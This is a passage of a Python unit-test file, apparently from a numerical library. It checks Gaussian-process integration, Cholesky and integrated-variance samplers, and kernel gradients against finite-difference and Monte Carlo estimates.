= gp.predict_random_realization(quad_points)[:, 0]\n I, I2 = vals.dot(quad_weights), (vals**2).dot(quad_weights)\n random_means.append(I)\n random_variances.append(I2-I**2)\n random_I2sq.append(I2**2)\n random_I2Isq.append(I2*I**2)\n random_I4.append(I**4)\n\n # print('MC expected random mean', np.mean(random_means))\n # print('MC variance random mean', np.var(random_means))\n # print('MC expected random variance', np.mean(random_variances))\n # print('MC variance random variance', np.var(random_variances))\n # print('expected random mean', expected_random_mean)\n # print('variance random mean', variance_random_mean)\n # print('expected random variance', expected_random_var)\n # print('variance random variance', variance_random_var)\n assert np.allclose(\n np.mean(random_means), expected_random_mean, rtol=1e-2)\n assert np.allclose(\n np.var(random_means), variance_random_mean, rtol=2.1e-2)\n assert np.allclose(\n expected_random_var, np.mean(random_variances), rtol=1e-2)\n assert np.allclose(\n variance_random_var, np.var(random_variances), rtol=2.2e-2)\n\n def test_integrate_gaussian_process_uniform(self):\n np.random.seed(1)\n nvars = 1\n def func(x): return np.sum(x**2, axis=0)[:, np.newaxis]\n\n ntrain_samples = 7\n train_samples = np.linspace(-1, 1, ntrain_samples)[np.newaxis, :]\n train_vals = func(train_samples)\n\n nu = np.inf\n kernel = Matern(length_scale_bounds=(1e-2, 10), nu=nu)\n # optimize variance\n # kernel = 1*kernel\n # optimize gp noise\n # kernel += WhiteKernel(noise_level_bounds=(1e-8, 1))\n gp = GaussianProcess(kernel, n_restarts_optimizer=1)\n gp.fit(train_samples, train_vals)\n\n univariate_variables = [stats.uniform(-1, 2)]\n variable = pya.IndependentMultivariateRandomVariable(\n univariate_variables)\n\n expected_random_mean, variance_random_mean, expected_random_var, \\\n variance_random_var = integrate_gaussian_process(gp, variable)\n\n true_mean = 1/3\n true_var = 1/5-1/3**2\n\n print('True mean', true_mean)\n print('Expected random mean', expected_random_mean)\n std_random_mean = np.sqrt(variance_random_mean)\n print('Variance random mean', variance_random_mean)\n print('Stdev random mean', std_random_mean)\n print('Expected random mean +/- 3 stdev',\n [expected_random_mean-3*std_random_mean,\n expected_random_mean+3*std_random_mean])\n assert np.allclose(true_mean, expected_random_mean, rtol=1e-2)\n\n print('True var', true_var)\n print('Expected random var', expected_random_var)\n assert np.allclose(expected_random_var, true_var, rtol=1e-2)\n\n nsamples = 1000\n random_means = []\n xx, ww = pya.gauss_jacobi_pts_wts_1D(100, 0, 0)\n quad_points = pya.cartesian_product([xx]*nvars)\n quad_weights = pya.outer_product([ww]*nvars)\n for ii in range(nsamples):\n vals = gp.predict_random_realization(quad_points)[:, 0]\n random_means.append(vals.dot(quad_weights))\n\n print('MC expected random mean', np.mean(random_means))\n print('MC variance random mean', np.var(random_means))\n assert np.allclose(\n np.mean(random_means), expected_random_mean, rtol=1e-2)\n assert np.allclose(\n np.var(random_means), variance_random_mean, rtol=1e-2)\n\n # xx=np.linspace(-1,1,101)\n # plt.plot(xx,func(xx[np.newaxis,:]))\n # gp_mean,gp_std = gp(xx[np.newaxis,:],return_std=True)\n # gp_mean = gp_mean[:,0]\n # plt.plot(xx,gp_mean)\n # plt.plot(train_samples[0,:],train_vals[:,0],'o')\n # plt.fill_between(xx,gp_mean-2*gp_std,gp_mean+2*gp_std,alpha=0.5)\n # vals = gp.predict_random_realization(xx[np.newaxis,:])\n # plt.plot(xx,vals)\n # plt.show()\n\n\nclass TestSamplers(unittest.TestCase):\n def setUp(self):\n np.random.seed(1)\n\n def test_cholesky_sampler_basic_restart(self):\n nvars = 1\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.uniform(-1, 2)]*nvars)\n sampler = CholeskySampler(nvars, 100, variables)\n kernel = pya.Matern(1, length_scale_bounds='fixed', nu=np.inf)\n sampler.set_kernel(kernel)\n\n num_samples = 10\n samples = sampler(num_samples)[0]\n\n sampler2 = CholeskySampler(nvars, 100, variables)\n sampler2.set_kernel(kernel)\n samples2 = sampler2(num_samples//2)[0]\n samples2 = np.hstack([samples2, sampler2(num_samples)[0]])\n assert np.allclose(samples2, samples)\n\n def test_cholesky_sampler_restart_with_changed_kernel(self):\n nvars = 1\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.uniform(-1, 2)]*nvars)\n kernel1 = pya.Matern(1, length_scale_bounds='fixed', nu=np.inf)\n kernel2 = pya.Matern(0.1, length_scale_bounds='fixed', nu=np.inf)\n\n num_samples = 10\n sampler = CholeskySampler(nvars, 100, variables)\n sampler.set_kernel(kernel1)\n samples = sampler(num_samples)[0]\n\n sampler2 = CholeskySampler(nvars, 100, variables)\n sampler2.set_kernel(kernel1)\n samples2 = sampler2(num_samples//2)[0]\n sampler2.set_kernel(kernel2)\n samples2 = np.hstack([samples2, sampler2(num_samples)[0]])\n\n # plt.plot(samples[0, :], samples[0, :]*0, 'o')\n # plt.plot(samples2[0, :], samples2[0, :]*0,'x')\n # plt.show()\n assert np.allclose(sampler2.pivots[:num_samples//2],\n sampler.pivots[:num_samples//2])\n assert not np.allclose(samples2, samples)\n\n def test_cholesky_sampler_restart_with_changed_weight_function(self):\n nvars = 1\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.uniform(-1, 2)]*nvars)\n kernel1 = pya.Matern(1, length_scale_bounds='fixed', nu=np.inf)\n \n def wfunction1(x): return np.ones(x.shape[1])\n \n def wfunction2(x): return x[0, :]**2\n\n num_samples = 10\n sampler = CholeskySampler(nvars, 100, variables)\n sampler.set_kernel(kernel1)\n sampler.set_weight_function(wfunction1)\n samples = sampler(num_samples)[0]\n\n sampler2 = CholeskySampler(nvars, 100, variables)\n sampler2.set_kernel(kernel1)\n sampler2.set_weight_function(wfunction1)\n samples2 = sampler2(num_samples//2)[0]\n sampler2.set_weight_function(wfunction2)\n samples2 = np.hstack([samples2, sampler2(num_samples)[0]])\n\n assert np.allclose(sampler2.pivots[:num_samples//2],\n sampler.pivots[:num_samples//2])\n\n assert not np.allclose(samples2, samples)\n\n def test_cholesky_sampler_adaptive_gp_fixed_kernel(self):\n nvars = 1\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.uniform(-1, 2)]*nvars)\n \n def func(samples): return np.array(\n [np.sum(samples**2, axis=0), np.sum(samples**3, axis=0)]).T\n\n validation_samples = np.random.uniform(0, 1, (nvars, 100))\n nsamples = 3\n\n kernel = pya.Matern(1, length_scale_bounds='fixed', nu=3.5)\n sampler1 = CholeskySampler(nvars, 100, None)\n sampler1.set_kernel(copy.deepcopy(kernel))\n gp1 = AdaptiveCholeskyGaussianProcessFixedKernel(sampler1, func)\n gp1.refine(nsamples)\n vals1 = gp1(validation_samples)\n\n # currently AdaptiveGaussianProcess can only handle scalar QoI\n # so only test first QoI of func.\n def func2(samples): return func(samples)[:, :1]\n \n sampler2 = CholeskySampler(nvars, 100, None)\n sampler2.set_kernel(copy.deepcopy(kernel))\n gp2 = AdaptiveGaussianProcess(kernel=kernel, alpha=1e-12)\n gp2.setup(func2, sampler2)\n gp2.refine(nsamples)\n vals2 = gp2(validation_samples)\n\n assert np.allclose(gp1.train_samples, gp2.X_train_.T)\n assert np.allclose(gp1.train_values[:, 0:1], gp2.y_train_)\n assert np.allclose(vals1[:, 0:1], vals2)\n\n # xx = np.linspace(0,1,101)\n # plt.plot(xx,gp1(xx[np.newaxis,:]),'-r')\n # plt.plot(xx,gp2(xx[np.newaxis,:]),'-k')\n # plt.plot(gp1.train_samples[0,:],gp1.train_values[:,0],'ro')\n # plt.plot(gp2.X_train_.T[0,:],gp2.y_train_,'ks')\n # plt.show()\n\n gp1.refine(2*nsamples)\n vals1 = gp1(validation_samples)\n gp2.refine(2*nsamples)\n vals2 = gp2(validation_samples)\n assert np.allclose(vals1[:, 0:1], vals2)\n\n def test_cholesky_sampler_adaptive_gp_fixed_kernel_II(self):\n np.random.seed(1)\n nvars = 10\n sampler_length_scale = 0.5\n sampler_matern_nu = np.inf\n ncandidate_samples = 1000\n\n alpha_stat, beta_stat = 20, 20\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(a=alpha_stat, b=beta_stat)]*nvars)\n\n generate_samples = partial(\n pya.generate_independent_random_samples, variables)\n\n weight_function = partial(\n pya.tensor_product_pdf,\n univariate_pdfs=partial(stats.beta.pdf, a=alpha_stat, b=beta_stat))\n\n def gp_mean_function(kernel, samples, alpha, X):\n return kernel(X.T, samples.T).dot(alpha)\n \n def random_gaussian_process(kernel, samples):\n alpha = np.random.normal(0, 1, (samples.shape[1], 1))\n return partial(gp_mean_function, kernel, samples, alpha)\n\n ntrials = 100\n lb, ub = 0, 1\n func_length_scale = sampler_length_scale\n func_matern_nu = sampler_matern_nu\n func_kernel = pya.Matern(\n func_length_scale, length_scale_bounds='fixed', nu=func_matern_nu)\n funcs = [random_gaussian_process(func_kernel, np.random.uniform(\n lb, ub, (nvars, 1000))) for n in range(ntrials)]\n\n def multiple_qoi_function(funcs, samples):\n return np.array([f(samples)[:,0] for f in funcs]).T\n \n func = partial(multiple_qoi_function, funcs)\n\n sampler_kernel = pya.Matern(\n sampler_length_scale, length_scale_bounds='fixed',\n nu=sampler_matern_nu)\n\n weight_function = None\n sampler = pya.CholeskySampler(\n nvars, ncandidate_samples, variables,\n generate_random_samples=generate_samples)\n sampler.set_kernel(copy.deepcopy(sampler_kernel))\n sampler.set_weight_function(weight_function)\n\n nvalidation_samples = 1000\n generate_validation_samples = generate_samples\n validation_samples = generate_validation_samples(nvalidation_samples)\n validation_values = func(validation_samples)\n\n class Callback(object):\n def __init__(self, validation_samples, validation_values,\n norm_ord=2):\n self.errors, self.nsamples, self.condition_numbers = [], [], []\n self.validation_samples = validation_samples\n self.validation_values = validation_values\n self.norm = partial(np.linalg.norm, ord=norm_ord)\n \n def __call__(self, approx):\n pred_values = approx(self.validation_samples)\n assert pred_values.shape == self.validation_values.shape\n error = self.norm(\n pred_values-self.validation_values,axis=0)/self.norm(\n self.validation_values, axis=0)\n self.errors.append(error)\n self.nsamples.append(approx.num_training_samples())\n self.condition_numbers.append(approx.condition_number())\n\n\n callback = Callback(validation_samples, validation_values)\n gp = pya.AdaptiveCholeskyGaussianProcessFixedKernel(sampler, func)\n\n #checkpoints = [5, 10, 100, 500]\n checkpoints = [5, 10, 20, 50, 100, 200, 300, 500, 1000]\n nsteps = len(checkpoints)\n for ii in range(nsteps):\n gp.refine(checkpoints[ii])\n callback(gp)\n\n assert np.median(callback.errors ,axis=1) < 1e-3\n \n #print(np.median(callback.errors,axis=1))\n #plt.loglog(checkpoints, np.median(callback.errors ,axis=1))\n #plt.show()\n\n \n \n def test_RBF_posterior_variance_gradient_wrt_samples(self):\n nvars = 2\n lb, ub = 0, 1\n ntrain_samples_1d = 10\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n\n length_scale = [0.1, 0.2][:nvars]\n kernel = RBF(length_scale, length_scale_bounds='fixed')\n\n pred_samples = np.random.uniform(0, 1, (nvars, 3))\n x0 = train_samples[:, :1]\n grad = RBF_gradient_wrt_samples(\n x0, pred_samples, length_scale)\n\n fd_grad = pya.approx_jacobian(\n lambda x: kernel(x, pred_samples.T)[0, :], x0[:,0])\n assert np.allclose(grad, fd_grad, atol=1e-6)\n errors = pya.check_gradients(\n lambda x: kernel(x.T, pred_samples.T)[0, :],\n lambda x: RBF_gradient_wrt_samples(\n x, pred_samples, length_scale), x0)\n assert errors.min()<1e-6\n\n jac = RBF_posterior_variance_jacobian_wrt_samples(\n train_samples, pred_samples, kernel)\n\n x0 = train_samples.flatten(order='F')\n assert np.allclose(\n train_samples, x0.reshape(train_samples.shape, order='F'))\n\n def func(x_flat):\n return gaussian_process_pointwise_variance(\n kernel, pred_samples, x_flat.reshape(\n train_samples.shape, order='F'))\n fd_jac = pya.approx_jacobian(func, x0)\n\n # print(jac, '\\n\\n',f d_jac)\n # print('\\n', np.absolute(jac-fd_jac).max())\n assert np.allclose(jac, fd_jac, atol=1e-5)\n\n errors = pya.check_gradients(\n func,\n lambda x: RBF_posterior_variance_jacobian_wrt_samples(\n x.reshape(nvars, x.shape[0]//nvars, order='F'),\n pred_samples, kernel), x0[:, np.newaxis])\n assert errors.min()<2e-6\n\n def check_matern_gradient_wrt_samples(self, nu):\n nvars = 2\n lb, ub = 0, 1\n ntrain_samples_1d = 3\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n\n length_scale = [0.1, 0.2][:nvars]\n kernel = Matern(length_scale, length_scale_bounds='fixed', nu=nu)\n\n pred_samples = np.random.uniform(lb, ub, (nvars, 1))\n x0 = train_samples[:, :1]\n grad = matern_gradient_wrt_samples(\n nu, x0, pred_samples, length_scale)\n K = kernel(x0.T, pred_samples.T)\n\n fd_grad = pya.approx_jacobian(\n lambda x: kernel(x, pred_samples.T)[0, :], x0[:,0])\n assert np.allclose(grad, fd_grad, atol=1e-6)\n errors = pya.check_gradients(\n lambda x: kernel(x.T, pred_samples.T)[0, :],\n lambda x: matern_gradient_wrt_samples(\n nu, x, pred_samples, length_scale), x0)\n assert errors.min()<1e-6\n\n def test_matern_gradient_wrt_samples(self):\n self.check_matern_gradient_wrt_samples(3/2)\n self.check_matern_gradient_wrt_samples(5/2)\n self.check_matern_gradient_wrt_samples(np.inf)\n\n def test_RBF_posterior_variance_gradient_wrt_samples_subset(\n self):\n nvars = 2\n lb, ub = 0, 1\n ntrain_samples_1d = 10\n def func(x): return np.sum(x**2, axis=0)[:, np.newaxis]\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n train_vals = func(train_samples)\n\n new_samples_index = train_samples.shape[1]-10\n\n length_scale = [0.1, 0.2][:nvars]\n kernel = RBF(length_scale, length_scale_bounds='fixed')\n\n pred_samples = np.random.uniform(0, 1, (nvars, 3))\n jac = RBF_posterior_variance_jacobian_wrt_samples(\n train_samples, pred_samples, kernel, new_samples_index)\n\n x0 = train_samples.flatten(order='F')\n assert np.allclose(\n train_samples, x0.reshape(train_samples.shape, order='F'))\n\n def func(x_flat):\n return gaussian_process_pointwise_variance(\n kernel, pred_samples, x_flat.reshape(\n train_samples.shape, order='F'))\n fd_jac = pya.approx_jacobian(func, x0)[:,new_samples_index*nvars:]\n\n # print(jac, '\\n\\n',f d_jac)\n #print('\\n', np.absolute(jac-fd_jac).max())\n assert np.allclose(jac, fd_jac, atol=1e-5)\n\n def test_integrate_grad_P(self):\n nvars = 2\n univariate_variables = [stats.norm()]*nvars\n #lb, ub = univariate_variables[0].interval(0.99999)\n lb, ub = -2, 2 \n\n ntrain_samples_1d = 2\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n\n length_scale = [0.5, 0.4][:nvars]\n kernel = RBF(length_scale, length_scale_bounds='fixed')\n\n # the shorter the length scale the larger the number of quadrature\n # points is needed\n xx_1d, ww_1d = pya.gauss_hermite_pts_wts_1D(100)\n grad_P = integrate_grad_P(\n [xx_1d]*nvars, [ww_1d]*nvars, train_samples, length_scale)[0]\n\n a, b = train_samples[:, 0]\n mu = [0]*nvars\n sigma = [1]*nvars\n term1 = gaussian_grad_P_diag_term1(a, length_scale[0], mu[0], sigma[0])\n term2 = gaussian_grad_P_diag_term2(b, length_scale[1], mu[1], sigma[1])\n assert np.allclose(\n term1,\n gaussian_grad_P_offdiag_term1(\n a, a, length_scale[0], mu[0], sigma[0]))\n assert np.allclose(\n term2,\n gaussian_grad_P_offdiag_term2(\n b, b, length_scale[1], mu[1], sigma[1]))\n assert np.allclose(\n term1,\n ((xx_1d-a)/length_scale[0]**2*np.exp(\n -(xx_1d-a)**2/(2*length_scale[0]**2))**2).dot(ww_1d))\n assert np.allclose(\n term2,(np.exp(-(xx_1d-b)**2/(2*length_scale[1]**2))**2).dot(ww_1d))\n\n pred_samples = pya.cartesian_product([xx_1d]*nvars)\n weights = pya.outer_product([ww_1d]*nvars)\n for ii in range(train_samples.shape[1]):\n x0 = train_samples[:, ii:ii+1]\n grad = RBF_gradient_wrt_samples(\n x0, pred_samples, length_scale)\n for jj in range(train_samples.shape[1]):\n x1 = train_samples[:, jj:jj+1]\n K = kernel(pred_samples.T, x1.T)\n for kk in range(nvars):\n grad_P_quad = (grad[:, kk:kk+1]*K).T.dot(weights)\n t1 = gaussian_grad_P_offdiag_term1(\n x0[kk, 0], x1[kk, 0], length_scale[kk],\n mu[kk], sigma[kk])\n t2 = gaussian_grad_P_offdiag_term2(\n x0[1-kk,0], x1[1-kk,0], length_scale[1-kk],\n mu[1-kk], sigma[1-kk])\n grad_P_exact = t1*t2\n if ii == jj:\n grad_P_quad *= 2\n grad_P_exact *= 2\n assert np.allclose(grad_P_quad, grad_P_exact)\n assert np.allclose(grad_P_quad, grad_P[nvars*ii+kk,jj])\n #assert False\n #assert np.allclose(grad_P_mc, grad_P[kk,ii,jj])\n\n def test_integrate_grad_P_II(self):\n nvars = 2\n univariate_variables = [stats.norm()]*nvars\n #lb, ub = univariate_variables[0].interval(0.99999)\n lb, ub = -2, 2 \n\n ntrain_samples_1d = 4\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n\n length_scale = [0.5, 0.4, 0.6][:nvars]\n kernel = RBF(length_scale, length_scale_bounds='fixed')\n\n # the shorter the length scale the larger the number of quadrature\n # points is needed\n xx_1d, ww_1d = pya.gauss_hermite_pts_wts_1D(100)\n grad_P, P = integrate_grad_P(\n [xx_1d]*nvars, [ww_1d]*nvars, train_samples, length_scale)\n\n def func1(xtr):\n xtr = xtr.reshape((nvars, train_samples.shape[1]), order='F')\n P = 1\n for kk in range(nvars):\n P *= integrate_tau_P(\n xx_1d, ww_1d, xtr[kk:kk+1, :], length_scale[kk])[1]\n\n vals = P.flatten(order='F')\n # vals = [P[0,0], P[1,0], ..., P[N-1,0], P[0,1], P[1,1], ... P[N-1,1]\n # ...]\n return vals\n\n x0 = train_samples.flatten(order='F')\n P_fd_jac = pya.approx_jacobian(func1, x0)\n ntrain_samples = train_samples.shape[1]\n assert np.allclose(\n P_fd_jac.shape, (ntrain_samples**2, nvars*ntrain_samples))\n P_fd_jac_res = P_fd_jac.reshape(\n (ntrain_samples, ntrain_samples, nvars*ntrain_samples), order='F')\n from sklearn.gaussian_process.kernels import _approx_fprime\n assert np.allclose(_approx_fprime(x0, lambda x: func1(x).reshape(ntrain_samples, ntrain_samples, order='F'), np.sqrt(np.finfo(float).eps)),P_fd_jac_res)\n\n # Consider 3 training samples with\n # P = P00 P01 P02\n # P10 P11 P12\n # P20 P21 P22\n # for kth training sample grad_P stores \n # Pk0 Pk1 Pk2\n # All entries not involving k are zero, e.g. for k=0 the terms\n # P11 P12 P21 P22 will be zero such that\n # dP/d(x[0,n]) = C00 C01 C02\n # C10 0 0\n # C20 0 0\n jac = np.empty_like(P_fd_jac)\n for kk in range(ntrain_samples):\n for nn in range(nvars):\n tmp = np.zeros((ntrain_samples, ntrain_samples))\n tmp[kk, :] = grad_P[kk*nvars+nn, :]\n tmp[:, kk] = tmp[kk, :]\n assert np.allclose(P_fd_jac_res[:, :, kk*nvars+nn], tmp)\n\n def func2(xtr):\n xtr = xtr.reshape((nvars, train_samples.shape[1]), order='F')\n A_inv = np.linalg.inv(kernel(xtr.T))\n return A_inv.flatten(order='F')\n\n def func3(xtr):\n xtr = xtr.reshape((nvars, train_samples.shape[1]), order='F')\n P = 1\n for kk in range(nvars):\n P *= integrate_tau_P(\n xx_1d, ww_1d, xtr[kk:kk+1, :], length_scale[kk])[1]\n A_inv = np.linalg.inv(kernel(xtr.T))\n val = np.sum(A_inv*P)\n return -val\n\n A_fd_jac = pya.approx_jacobian(func2, x0).reshape((\n ntrain_samples, ntrain_samples, nvars*ntrain_samples), order='F')\n assert np.allclose(_approx_fprime(x0, lambda x: func2(x).reshape(ntrain_samples, ntrain_samples, order='F'), np.sqrt(np.finfo(float).eps)),A_fd_jac)\n\n A_inv = np.linalg.inv(kernel(train_samples.T))\n assert np.allclose(func3(x0),-np.sum(A_inv*P))\n obj_fd_split = -np.sum(A_fd_jac*P[:,:,np.newaxis] + P_fd_jac_res*A_inv[:,:,np.newaxis],axis=(0,1))\n \n obj_fd_jac = pya.approx_jacobian(func3, x0)[0,:]\n assert np.allclose(obj_fd_split, obj_fd_jac)\n\n assert np.allclose(\n P, func1(x0).reshape((ntrain_samples, ntrain_samples), order='F'))\n jac = np.zeros((nvars*ntrain_samples))\n jac1 = np.zeros((nvars*ntrain_samples))\n AinvPAinv = (A_inv.dot(P).dot(A_inv))\n for kk in range(ntrain_samples):\n K_train_grad_all_train_points_kk = \\\n RBF_gradient_wrt_samples(\n train_samples[:, kk:kk+1], train_samples, length_scale)\n # Use the follow properties for tmp3 and tmp4\n # Do sparse matrix element wise product\n # 0 a 0 D00 D01 D02\n # a b c x D10 D11 D12\n # 0 c 0 D20 D21 D22\n # =2*(a*D01 b*D11 + c*D21)-b*D11\n #\n # Trace [RCRP] = Trace[RPRC] for symmetric matrices\n tmp3 = -2*np.sum(K_train_grad_all_train_points_kk.T*AinvPAinv[:, kk],\n axis=1)\n tmp3 -= -K_train_grad_all_train_points_kk[kk, :]*AinvPAinv[kk, kk]\n jac1[kk*nvars:(kk+1)*nvars] = -tmp3\n tmp4 = 2*np.sum(grad_P[kk*nvars:(kk+1)*nvars]*A_inv[:, kk], axis=1)\n tmp4 -= grad_P[kk*nvars:(kk+1)*nvars,kk]*A_inv[kk, kk]\n jac1[kk*nvars:(kk+1)*nvars] -= tmp4\n # check these numpy operations with an explicit loop calculation\n for nn in range(nvars):\n tmp1 = np.zeros((ntrain_samples, ntrain_samples))\n tmp1[kk, :] = grad_P[kk*nvars+nn, :]\n tmp1[:, kk] = tmp1[kk, :]\n assert np.allclose(P_fd_jac_res[:,:,kk*nvars+nn], tmp1)\n tmp2 = np.zeros((ntrain_samples, ntrain_samples))\n tmp2[kk, :] = K_train_grad_all_train_points_kk[:, nn]\n tmp2[:, kk] = tmp2[kk, :]\n tmp2 = -A_inv.dot(tmp2.dot(A_inv))\n assert np.allclose(A_fd_jac[:,:,kk*nvars+nn], tmp2, atol=1e-6)\n jac[kk*nvars+nn] -= np.sum(tmp2*P+A_inv*tmp1)\n\n assert np.allclose(jac, obj_fd_jac)\n assert np.allclose(jac1, obj_fd_jac)\n\n jac2 = \\\n RBF_integrated_posterior_variance_gradient_wrt_samples(\n train_samples, [xx_1d]*nvars, [ww_1d]*nvars, kernel)\n assert np.allclose(jac2, obj_fd_jac)\n\n def test_RBF_integrated_posterior_variance_gradient_wrt_sample_subset(self):\n nvars = 2\n lb, ub = -1, 1\n ntrain_samples_1d = 10\n def func(x): return np.sum(x**2, axis=0)[:, np.newaxis]\n\n train_samples = pya.cartesian_product(\n [np.linspace(lb, ub, ntrain_samples_1d)]*nvars)\n train_vals = func(train_samples)\n\n new_samples_index = train_samples.shape[1]-10\n\n length_scale = [0.1, 0.2][:nvars]\n kernel = RBF(length_scale, length_scale_bounds='fixed')\n\n xx_1d, ww_1d = pya.gauss_jacobi_pts_wts_1D(100, 0, 0)\n t0 = time.time()\n jac = RBF_integrated_posterior_variance_gradient_wrt_samples(\n train_samples, [xx_1d]*nvars, [ww_1d]*nvars, kernel,\n new_samples_index)\n print(time.time()-t0)\n\n x0 = train_samples.flatten(order='F')\n assert np.allclose(\n train_samples, x0.reshape(train_samples.shape, order='F'))\n\n def func(x_flat):\n xtr = x_flat.reshape((nvars, train_samples.shape[1]), order='F')\n P = 1\n for kk in range(nvars):\n P *= integrate_tau_P(\n xx_1d, ww_1d, xtr[kk:kk+1, :], length_scale[kk])[1]\n A_inv = np.linalg.inv(kernel(xtr.T))\n val = np.sum(A_inv*P)\n return -val\n\n t0 = time.time()\n fd_jac = pya.approx_jacobian(func, x0)[0,new_samples_index*nvars:]\n print(time.time()-t0)\n\n print(jac, '\\n\\n', fd_jac)\n #print('\\n', np.absolute(jac-fd_jac).max())\n assert np.allclose(jac, fd_jac, atol=1e-5)\n\n def test_monte_carlo_gradient_based_ivar_sampler(self):\n nvars = 2\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(20, 20)]*nvars)\n generate_random_samples = partial(\n pya.generate_independent_random_samples, variables)\n \n # correlation length affects ability to check gradient. As kerenl matrix\n # gets more ill conditioned then gradients get worse\n greedy_method = 'ivar'\n #greedy_method = 'chol'\n use_gauss_quadrature = False\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n sampler = IVARSampler(\n nvars, 1000, 1000, generate_random_samples, variables,\n greedy_method, use_gauss_quadrature=use_gauss_quadrature,\n nugget=1e-14)\n sampler.set_kernel(copy.deepcopy(kernel))\n\n def weight_function(samples):\n return np.prod([variables.all_variables()[ii].pdf(samples[ii,:])\n for ii in range(samples.shape[0])],axis=0)\n\n if greedy_method == 'chol':\n sampler.set_weight_function(weight_function)\n\n # nature of training samples affects ability to check gradient. As\n # training samples makes kernel matrix more ill conditioned then\n # gradients get worse\n ntrain_samples_1d = 10\n train_samples = pya.cartesian_product(\n [np.linspace(0, 1, ntrain_samples_1d)]*nvars)\n x0 = train_samples.flatten(order='F')\n if not use_gauss_quadrature:\n # gradients not currently implemented when using quadrature\n errors = pya.check_gradients(\n sampler.objective, sampler.objective_gradient, x0[:,np.newaxis],\n disp=False)\n assert errors.min()<4e-6\n\n gsampler = sampler.greedy_sampler\n #print(np.linalg.norm(gsampler.candidate_samples))\n #print(np.linalg.norm(sampler.pred_samples))\n\n ntrain_samples = 20\n new_samples1 = sampler(ntrain_samples)[0].copy()\n\n val1 = gaussian_process_pointwise_variance(\n sampler.greedy_sampler.kernel, sampler.pred_samples,\n sampler.training_samples).mean()\n val2 = gaussian_process_pointwise_variance(\n sampler.greedy_sampler.kernel, sampler.pred_samples,\n sampler.init_guess).mean()\n # can't just call sampler.objective here because self.training_points\n # has been updated and calling objective(sampler.training_samples)\n # will evaluate objective with training samples repeated twice.\n # Similarly init guess will be concatenated with self.training_samples\n # if passed to objective at this point\n print(val1, val2)\n assert (val1 < val2)\n\n new_samples2 = sampler(2*ntrain_samples)[0]\n # currently the following check will fail because a different set\n # of prediction samples will be generated by greedy sampler\n # assert np.allclose(\n # 1+sampler.greedy_sampler.best_obj_vals[ntrain_samples-1], val1)\n\n assert np.allclose(\n new_samples1, sampler.training_samples[:, :ntrain_samples],\n atol=1e-12)\n\n assert np.allclose(\n sampler.greedy_sampler.training_samples[:, :ntrain_samples],\n new_samples1, atol=1e-12)\n \n val1 = gaussian_process_pointwise_variance(\n sampler.greedy_sampler.kernel, sampler.pred_samples,\n sampler.training_samples).mean()\n # initial guess used by optimizer does not contain\n # fixed training points already selected so add here \n greedy_samples = np.hstack([sampler.training_samples[:,:ntrain_samples],\n sampler.init_guess])\n val2 = gaussian_process_pointwise_variance(\n sampler.greedy_sampler.kernel, sampler.pred_samples,\n greedy_samples).mean()\n print(val1, val2)\n assert (val1 < val2)\n \n # plt.plot(sampler.training_samples[0, :],\n # sampler.training_samples[1, :], 'o')\n # plt.plot(sampler.greedy_sampler.training_samples[0, :],\n # sampler.greedy_sampler.training_samples[1, :], 'x')\n # plt.plot(sampler.init_guess[0, :],\n # sampler.init_guess[1, :], '^')\n # plt.show()\n\n def test_quadrature_gradient_based_ivar_sampler(self):\n nvars = 2\n variables = pya.IndependentMultivariateRandomVariable(\n [stats.beta(20, 20)]*nvars)\n generate_random_samples = partial(\n pya.generate_independent_random_samples, variables)\n \n # correlation length affects ability to check gradient. As kerenl matrix\n # gets more ill conditioned then gradients get worse\n greedy_method = 'ivar'\n #greedy_method = 'chol'\n use_gauss_quadrature = True\n kernel = pya.Matern(.1, length_scale_bounds='fixed', nu=np.inf)\n sampler = IVARSampler(\n nvars, 1000, 1000, generate_random_samples, variables,\n greedy_method, use_gauss_quadrature=use_gauss_quadrature)\n sampler.set_kernel(copy.deepcopy(kernel))\n\n def weight_function(samples):\n return np.prod([variables.all_variables()[ii].pdf(samples[ii,:])\n for ii in range(samples.shape[0])],axis=0)\n\n if greedy_method == 'chol':\n sampler.set_weight_function(weight_function)\n\n # nature of training samples affects ability to check gradient. As\n # training samples makes kernel matrix more ill conditioned then\n # gradients get worse\n ntrain_samples_1d = 10\n train_samples = pya.cartesian_product(\n [np.linspace(0, 1, ntrain_samples_1d)]*nvars)\n x0 = train_samples.flatten(order='F')\n if not use_gauss_quadrature:\n # gradients not currently implemented when using quadrature\n errors = pya.check_gradients(\n sampler.objective, sampler.objective_gradient, x0[:,np.newaxis],\n disp=False)\n assert errors.min()<4e-6\n\n gsampler = sampler.greedy_sampler\n #print(np.linalg.norm(gsampler.candidate_samples))\n #print(np.linalg.norm(sampler.pred_samples))\n\n ntrain_samples = 20\n new_samples1 = sampler(ntrain_samples)[0].copy()\n\n A_inv = np.linalg.inv(kernel(sampler.training_samples.T))\n P = sampler.compute_P(sampler.training_samples)\n val1 = 1-np.trace(A_inv.dot(P))\n A_inv = np.linalg.inv(kernel(sampler.init_guess.T))\n P = sampler.compute_P(sampler.init_guess)\n val2 = 1-np.trace(A_inv.dot(P))\n \n # can't just call sampler.objective here because self.training_points\n # has been updated and calling objective(sampler.training_samples)\n # will evaluate objective with training samples repeated twice.\n # Similarly init guess will be concatenated with self.training_samples\n # if passed to objective at this point\n print(val1, val2)\n assert (val1 < val2)\n\n new_samples2 = sampler(2*ntrain_samples)[0]\n assert np.allclose(\n 1+sampler.greedy_sampler.best_obj_vals[ntrain_samples-1], val1)\n\n assert np.allclose(\n new_samples1, sampler.training_samples[:, :ntrain_samples],\n atol=1e-12)\n\n assert np.allclose(\n sampler.greedy_sampler.training_samples[:, :ntrain_samples],\n new_samples1, atol=1e-12)\n \n A_inv = np.linalg.inv(kernel(sampler.training_samples.T))\n P = sampler.compute_P(sampler.training_samples)\n 